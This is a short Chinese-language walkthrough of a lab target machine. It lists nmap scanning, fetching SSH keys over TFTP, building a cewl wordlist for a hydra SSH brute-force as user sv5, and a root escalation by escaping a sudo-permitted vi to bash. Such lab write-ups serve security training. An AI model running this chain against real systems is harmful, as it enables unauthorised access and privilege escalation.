kali：192.168.111.111

靶机：192.168.111.236

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.236

查看80端口的robots.txt提示三个文件

snmpwalk.txt内容，tftp服务在1337端口

sshfolder.txt内容，提示用户名sv5

tftp连接目标下载id_rsa和id_rsa.pub

tftp 192.168.111.236 1337
get id_rsa
get id_rsa.pub

利用cewl爬取目标网站生成字典，再利用生成的字典爆破ssh

cewl http://192.168.111.236 -w pass.txt
hydra -l sv5 -P ./pass.txt 192.168.111.236 -s 22 ssh -t 64

提权

sv5用户sudo权限

提升为root

sudo -u root /usr/bin/vi /tmp/a.txt
:!/bin/bash									#进入末行模式输入

flag